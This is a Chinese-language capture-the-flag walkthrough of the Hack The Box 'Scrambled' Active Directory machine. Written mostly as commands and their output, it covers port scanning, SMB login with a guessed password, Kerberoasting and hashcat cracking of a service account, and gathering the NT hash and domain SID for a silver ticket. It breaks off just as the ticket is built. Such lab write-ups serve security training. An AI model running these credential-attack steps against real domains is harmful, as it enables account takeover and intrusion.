Scrambled-htb-writeup

0x00 靶场技能介绍

章节技能:网页信息汇总分析、账号密码相同、kerberosroasting、域环境下的smbclient 登录、md4密码哈希生成、域SID获取、白银票据制作、使用票据登录mssql数据库、xp_cmdshell函数利用、runas命令使用、4411端口服务反序列化漏洞利用

参考链接:https://b0ysie7e.gitbook.io/articulos/write-up/hackthebox/2024-03-15-scrambled#silver-ticket-attack

参考链接:https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html

0x01 用户权限获取

1、靶机官方描述:

1
Scrambled 是一台中型 Windows Active Directory 计算机。通过枚举远程计算机上托管的网站,潜在攻击者能够推断出用户“ksimpson”的凭据。该网站还指出 NTLM 身份验证已禁用,这意味着将使用 Kerberos 身份验证。使用“ksimpson”的凭据访问“Public”共享时,PDF 文件指出攻击者检索了 SQL 数据库的凭据。这表明远程计算机上正在运行 SQL 服务。枚举普通用户帐户,发现帐户“SqlSvc”具有与其关联的“服务主体名称”(SPN)。攻击者可以使用此信息执行称为“kerberoasting”的攻击并获取“SqlSvc”的哈希值。在破解哈希并获取“SqlSvc”帐户的凭据后,攻击者可以执行“银票”攻击来伪造票并冒充远程 MSSQL 服务上的用户“管理员”。数据库的枚举显示了用户“MiscSvc”的凭据,该凭据可用于使用 PowerShell 远程处理在远程计算机上执行代码。当新用户显示一个正在侦听端口“4411”的“.NET”应用程序时,系统枚举。对应用程序进行逆向工程显示,它正在使用不安全的“Binary Formatter”类来传输数据,从而允许攻击者上传自己的有效负载并以“ntauthority\system”的身份执行代码。

2、获取下靶机IP地址:10.10.11.168

3、扫描下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.168 -oG allports
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:14 CST
Nmap scan report for 10.10.11.168
Host is up (0.34s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
4411/tcp  open  found
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49728/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 48.92 seconds
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49728,                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49728 -sC -sV --min-rate=10.10.11.168       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:15 CST
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.13 seconds
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49728 -sC -sV --min-rate=10000 10.10.11.168  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:16 CST
Nmap scan report for 10.10.11.168
Host is up (0.13s latency).

Bug in ms-sql-ntlm-info: no string output.
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-07 14:12:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m54s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after:  2025-04-07T13:59:53
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m53s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after:  2025-04-07T13:59:53
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-07T14:09:43
|_Not valid after:  2054-04-07T14:09:43
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m54s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after:  2025-04-07T13:59:53
|_ssl-date: 2024-04-07T14:16:30+00:00; -8h02m54s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m53s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after:  2025-04-07T13:59:53
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49728/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.94SVN%I=7%D=4/8%Time=66131B2A%P=aarch64-unknown-linux-
SF:gnu%r(NULL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS
SF:_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECO
SF:RP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck
SF:,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP
SF:_ORDERS_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERR
SF:OR_UNKNOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0
SF:\.3;\r\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:")%r(TLSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1
SF:D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_OR
SF:DERS_V1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")
SF:%r(FourOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN
SF:_COMMAND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_
SF:UNKNOWN_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3
SF:;\r\n")%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOpti
SF:ons,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r
SF:(LANDesk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D
SF:,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\
SF:.0\.3;\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaR
SF:MI,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECOR
SF:P_ORDERS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;
SF:\r\n")%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.
SF:3;\r\n");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-04-07T14:15:47
|_  start_date: N/A
|_clock-skew: mean: -8h02m54s, deviation: 1s, median: -8h02m54s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.76 seconds

4、将端口扫描发现的地址,绑定到本地hosts中

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.168 DC1.scrm.local scrm.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.168 DC1.scrm.local scrm.local

5、查看下80端口的服务内容吧

http://10.10.11.168/index.html

http://10.10.11.168/support.html

1
202194日:由于上个月的安全漏洞,我们现在已经禁用了网络上的所有NTLM身份验证。这可能会导致问题的一些程序您使用,所以请耐心等待,而我们的工作,以解决任何问题

6、参照上面的提示,看来该系统是禁用了NTLM的身份认证,也就是,只能通过域名的形式的域认证了,基于域内IP地址的认证是不行了,那继续看下一个地址

http://10.10.11.168/supportrequest.html

请将您的电子邮件发送至support@scramblecorp.com,我们将尽快回复您。

7、其实基于上面的这也截图中,我们也是发现了一个用户的IP的

ksimpson

8、这里我想到的是Asreproasting 攻击漏洞,但是尝试失败了

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.168 scrm.local/ksimpson -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for ksimpson
[-] User ksimpson doesn't have UF_DONT_REQUIRE_PREAUTH set

9、那继续查看网站信息,挖掘信息吧

http://10.10.11.168/passwords.html

1
我们的自助密码重置系统将很快启动并运行,但在此期间,请致电IT支持热线,我们将重置您的密码。如果没有人可用,请留言说明您的用户名,我们将重置您的密码与用户名相同。

http://10.10.11.168/salesorders.html

10、在这里看上面的提示,是否意味着用户名就是密码呢?我们使用SMBclient工具尝试下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbclient -k scrm.local/ksimpson:ksimpson@DC1.scrm.local -dc-ip 10.10.11.168
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
Type help for list of commands
# share
*** Unknown syntax: share
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL
# use Public
# ls
drw-rw-rw-          0  Fri Nov  5 06:23:19 2021 .
drw-rw-rw-          0  Fri Nov  5 06:23:19 2021 ..
-rw-rw-rw-     630106  Sat Nov  6 01:45:07 2021 Network Security Changes.pdf
# get 'Network Security Changes.pdf'
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
# get Network Security Changes.pdf
#

11、这里下载了一个PDF文件,查看下这个文件吧

file:///home/kali/Desktop/Network%20Security%20Changes.pdf

1
2
3
4
5
6
7
正如您可能已经听说的,我们的网络最近被入侵,攻击者能够访问我们的所有数据。我们已经确定了攻击者能够获得访问权限的方式,并立即进行了一些更改。您可以找到下面列出的这些以及这些更改可能影响您的方式。
变更:由于攻击者使用了所谓的“NTLM中继”,我们已经在整个网络中禁用了NTLM身份验证。
受影响用户:所有
解决办法:当您登录或访问网络资源时,现在将使用Kerberos身份验证(这绝对是100%安全的,绝对没有任何人可以利用它)。这将需要您使用完整的域名(scrm.local)与您的用户名和您访问的任何服务器名称。
变更:攻击者能够从我们的人力资源软件使用的SQL数据库中检索凭据,因此我们删除了除网络管理员以外的所有人对SOL服务的所有访问权限。
受影响的用户:人力资源部门
解决办法:如果您无法再访问HR软件,请联系我们,我们将手动重新授予您的帐户访问权限。

12、看到这里,我又想到,既然我们有了域内的账号密码,那是否可以kerberosRoast攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-host 'dc1.scrm.local' -request
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-04 00:32:02.351452  2024-04-07 22:09:41.785250             
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-04 00:32:02.351452  2024-04-07 22:09:41.785250             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3d7b8500d43ce6a2016a85c70a244e93$4d7c0b0789f88ca5c5ee876f66b3d55bc7dabe1f7fa515bed48cb126310338ed8be9a88b82491700bf8ff6bf712f102765d764647b837e6df52634026190e8b01e3e85f1ccf061cbb01c8c4e7d0d8c2f9f66599f0b8a5b1053fb4829649afdb4fa350c77aca8883fcad4724f3fa4ab81e691785033909e6c801eb6e89085f082d5b58a00da0e616508a0e8d5ae8c9c2a70f627d5022259c2657dbef235005d35af39de038e243dc7592e02129b0bb5a9c4e00cdbe7a544432c6e3b4412490dd7c369b95463298d9c4a285534b330c2b3ed97c1900919ee15211abdf393dfe711d2e17c55f9d3a1440f925d2767ae018eab09fc3a5868f6f0e3961e842b0c936f63952420093a6159f7d9615e9bbb7c9c7e0ecbe0965a57566dd8f8b8b3c9072e82349a06c454173023b40e97da0a8c7a0028d74f04da39718315c8926d5d3a6b811fbff722535a4371bbee41fde92fb1c6de56cef80f564271de391b83b74e40bddea0df139dda098c33b06a61eecc30d4dc63ce646063a808d66518a3de0b48aa32226421f10c9f3b40f39d351aca6d7c2e3ba44ab06c481bd5d7c0daf938ebb9021f680f5cca3d4ea3bf7863fb2826c34478ad2b61ea06ad20b0d41bfb2e8704f7f4f096682ff81eade3946713aa7efb5bb4ee10c7c32260273cc303fe2762b0184e7700397429a3d31306ae0e0ae41cba0b4ba7f71d4709c76c201ca834907715b0d8f3ab912f0b1d07fefb855a813e8dcfcd1a1cc0acd202bde5870b3a6ec1a00eba72751b303e98d69b3b16ea9ef5d10360dee607929638354ad6f55629e1fdb0c2b8cbe25f6593167394cba07dc74908ff0d2f97440c9ddbf37b1b268564902565ababda7c744930823c2d9a1a5c160c0780ac576dbb1a1255b7e0d23c8bcf2a79a14c079a500c2189383869eabc0949655794cacfcf8883dc85b0f7f1d6151ac87992baad4d385fbfbe354ede517aad09c47ac6fdbfce58b956431ea1c05b9746f3d9fd5b350eec783f674b6efc353630b97d8a5163ac585d6a6e9db5b54d21ecfce69001d73311b93053517f9138f677de38622b6a7f66c872fa6f13b50642de58d42c389513c45400d30eaebfaba10c5e08671a27d0a3c9f90b605878123aeff86cc2b54ca69e5a1d62d781c9114cc05882ba1e500af7b8cdc5ad3a4b9fcae541d8d07972175efd4b6976afe803b50f946bf0390ec27b949fb9f1efa0b5b7eb1002b2f61a38c799bf6cd699059363ccd5418a61b822891795802b6784cb74019c0ef2a29c675a31ab83980fbeec832134c645d513dbc16745503b18d937f4f61336bb593157588620b360ad02bf731fee1a55deaa518d11012b7f6553ede19dad9e5deca07b7232bedc10073157fedad4a2a24d72b570177b87fe14db77fec67156f05682dc381d1457db2d4c7d39fecbe7e532fad3ff

13、尝试破解下密码吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt                     
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3d7b8500d43ce6a2016a85c70a244e93$4d7c0b0789f88ca5c5ee876f66b3d55bc7dabe1f7fa515bed48cb126310338ed8be9a88b82491700bf8ff6bf712f102765d764647b837e6df52634026190e8b01e3e85f1ccf061cbb01c8c4e7d0d8c2f9f66599f0b8a5b1053fb4829649afdb4fa350c77aca8883fcad4724f3fa4ab81e691785033909e6c801eb6e89085f082d5b58a00da0e616508a0e8d5ae8c9c2a70f627d5022259c2657dbef235005d35af39de038e243dc7592e02129b0bb5a9c4e00cdbe7a544432c6e3b4412490dd7c369b95463298d9c4a285534b330c2b3ed97c1900919ee15211abdf393dfe711d2e17c55f9d3a1440f925d2767ae018eab09fc3a5868f6f0e3961e842b0c936f63952420093a6159f7d9615e9bbb7c9c7e0ecbe0965a57566dd8f8b8b3c9072e82349a06c454173023b40e97da0a8c7a0028d74f04da39718315c8926d5d3a6b811fbff722535a4371bbee41fde92fb1c6de56cef80f564271de391b83b74e40bddea0df139dda098c33b06a61eecc30d4dc63ce646063a808d66518a3de0b48aa32226421f10c9f3b40f39d351aca6d7c2e3ba44ab06c481bd5d7c0daf938ebb9021f680f5cca3d4ea3bf7863fb2826c34478ad2b61ea06ad20b0d41bfb2e8704f7f4f096682ff81eade3946713aa7efb5bb4ee10c7c32260273cc303fe2762b0184e7700397429a3d31306ae0e0ae41cba0b4ba7f71d4709c76c201ca834907715b0d8f3ab912f0b1d07fefb855a813e8dcfcd1a1cc0acd202bde5870b3a6ec1a00eba72751b303e98d69b3b16ea9ef5d10360dee607929638354ad6f55629e1fdb0c2b8cbe25f6593167394cba07dc74908ff0d2f97440c9ddbf37b1b268564902565ababda7c744930823c2d9a1a5c160c0780ac576dbb1a1255b7e0d23c8bcf2a79a14c079a500c2189383869eabc0949655794cacfcf8883dc85b0f7f1d6151ac87992baad4d385fbfbe354ede517aad09c47ac6fdbfce58b956431ea1c05b9746f3d9fd5b350eec783f674b6efc353630b97d8a5163ac585d6a6e9db5b54d21ecfce69001d73311b93053517f9138f677de38622b6a7f66c872fa6f13b50642de58d42c389513c45400d30eaebfaba10c5e08671a27d0a3c9f90b605878123aeff86cc2b54ca69e5a1d62d781c9114cc05882ba1e500af7b8cdc5ad3a4b9fcae541d8d07972175efd4b6976afe803b50f946bf0390ec27b949fb9f1efa0b5b7eb1002b2f61a38c799bf6cd699059363ccd5418a61b822891795802b6784cb74019c0ef2a29c675a31ab83980fbeec832134c645d513dbc16745503b18d937f4f61336bb593157588620b360ad02bf731fee1a55deaa518d11012b7f6553ede19dad9e5deca07b7232bedc10073157fedad4a2a24d72b570177b87fe14db77fec67156f05682dc381d1457db2d4c7d39fecbe7e532fad3ff:Pegasus60
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3...fad3ff
Time.Started.....: Sun Apr  7 23:40:25 2024 (7 secs)
Time.Estimated...: Sun Apr  7 23:40:32 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1699.4 kH/s (0.45ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10729472/14344385 (74.80%)
Rejected.........: 0/10729472 (0.00%)
Restore.Point....: 10728448/14344385 (74.79%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: People2People -> Pearson1
Hardware.Mon.#1..: Util: 79%

Started: Sun Apr  7 23:40:25 2024
Stopped: Sun Apr  7 23:40:33 2024

sqlsvc
Pegasus60

14、这里获取的这个用户名和密码,以及结合上面PDF里的信息,估计就是让访问SQL里的数据,或者下一步吧,如何访问了就是只能是通过票据来访问, 目前的方法只能是白银票据来访问了,毕竟我们获取的这个可能就是服务账号了。

15、白银票据需要有3个关键的信息来构建,服务账号哈希、域SID、以及服务账号,那首先我们生成服务账号哈希

1
2
3
┌──(kali㉿offsec)-[~/Desktop]
└─$ iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05

16、通过 impacket-getPac 来获取域SID值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-getPac scrm.local/sqlsvc:Pegasus60 -targetUser administrator
Impacket v0.11.0 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   867386488 
    dwHighDateTime:                  31099125 
LogoffTime:                     
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
KickOffTime:                    
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
PasswordLastSet:                
    dwLowDateTime:                   2585823167 
    dwHighDateTime:                  30921784 
PasswordCanChange:              
    dwLowDateTime:                   3297396671 
    dwHighDateTime:                  30921985 
PasswordMustChange:             
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
EffectiveName:                   'administrator' 
FullName:                        '' 
LogonScript:                     '' 
ProfilePath:                     '' 
HomeDirectory:                   '' 
HomeDirectoryDrive:              '' 
LogonCount:                      256 
BadPasswordCount:                0 
UserId:                          500 
PrimaryGroupId:                  513 
GroupCount:                      5 
GroupIds:                       
    [
         
        RelativeId:                      513 
        Attributes:                      7 ,
         
        RelativeId:                      512 
        Attributes:                      7 ,
         
        RelativeId:                      520 
        Attributes:                      7 ,
         
        RelativeId:                      518 
        Attributes:                      7 ,
         
        RelativeId:                      519 
        Attributes:                      7 ,
    ] 
UserFlags:                       544 
UserSessionKey:                 
    Data:                            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' 
LogonServer:                     'DC1' 
LogonDomainName:                 'SCRM' 
LogonDomainId:                  
    Revision:                        1 
    SubAuthorityCount:               4 
    IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x05' 
    SubAuthority:                   
        [
             21,
             2743207045,
             1827831105,
             2542523200,
        ] 
LMKey:                           b'\x00\x00\x00\x00\x00\x00\x00\x00' 
UserAccountControl:              16912 
SubAuthStatus:                   0 
LastSuccessfulILogon:           
    dwLowDateTime:                   0 
    dwHighDateTime:                  0 
LastFailedILogon:               
    dwLowDateTime:                   0 
    dwHighDateTime:                  0 
FailedILogonCount:               0 
Reserved3:                       0 
SidCount:                        1 
ExtraSids:                      
    [
         
        Sid:                            
            Revision:                        1 
            SubAuthorityCount:               1 
            IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x12' 
            SubAuthority:                   
                [
                     2,
                ] 
        Attributes:                      7 ,
    ] 
ResourceGroupDomainSid:         
    Revision:                        1 
    SubAuthorityCount:               4 
    IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x05' 
    SubAuthority:                   
        [
             21,
             2743207045,
             1827831105,
             2542523200,
        ] 
ResourceGroupCount:              1 
ResourceGroupIds:               
    [
         
        RelativeId:                      572 
        Attributes:                      536870919 ,
    ] 
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

 0000   10 00 00 00 89 20 BF 29  25 D0 28 2D F6 C2 35 24   ..... .)%.(-..5$

17、那截止到目前,我们就获取到关键的3个信息了,服务主题账号这个是固定的值

1
2
3
4
5
b999a16500b87d17ec7f2e2a68778f05

S-1-5-21-2743207045-1827831105-2542523200

MSSQLSvc/dc1.scrm.local

18、构造白银票据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
